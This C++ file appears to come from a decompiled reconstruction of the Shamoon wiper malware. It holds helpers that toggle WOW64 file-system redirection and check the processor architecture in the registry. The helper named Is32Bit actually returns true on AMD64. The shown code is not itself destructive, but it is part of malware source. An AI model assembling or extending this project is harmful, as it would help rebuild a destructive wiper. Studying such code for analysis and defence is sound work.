// Copyright 2015 Christian Roggia. All rights reserved.
// Use of this source code is governed by an Apache 2.0 license that can be
// found in the LICENSE file.

#include "System.h"

int Shamoon::Utils::System::_Wow64DisableWow64FsRedirection(PVOID *OldValue)
{
	FARPROC pAddr; // eax@1

	pAddr = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "Wow64DisableWow64FsRedirection");
	return (pAddr) ? ((int (__stdcall *)(PVOID *))pAddr)(OldValue) : 0;
}

int Shamoon::Utils::System::_Wow64RevertWow64FsRedirection(PVOID OlValue)
{
	FARPROC pAddr; // eax@1

	pAddr = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "Wow64RevertWow64FsRedirection");
	return (pAddr) ? ((int (__stdcall *)(PVOID))pAddr)(OlValue) : 0;
}

bool Shamoon::Utils::System::Is32Bit()
{
	DWORD Type; // [sp+4h] [bp-DCh]@2
	HKEY hKey; // [sp+8h] [bp-D8h]@1
	DWORD cbData; // [sp+Ch] [bp-D4h]@2
	BYTE Data[100]; // [sp+10h] [bp-D0h]@2
	WCHAR processor_architecture[52]; // [sp+74h] [bp-6Ch]@4

	if(RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", 0, KEY_EXECUTE, &hKey))
		return false;
	
	Type = 0;
	cbData = 100;
	if(RegQueryValueExW(hKey, L"PROCESSOR_ARCHITECTURE", 0, &Type, Data, &cbData))
	{
		RegCloseKey(hKey);
		return false;
	}
	
	if(cbData <= 0)
		return false;
	
	memmove(processor_architecture, Data, cbData);
	processor_architecture[cbData / 2] = 0;
	
	if(wcscmp(L"AMD64", processor_architecture) && wcscmp(L"amd64", processor_architecture))
		return false;
	
	return true;
}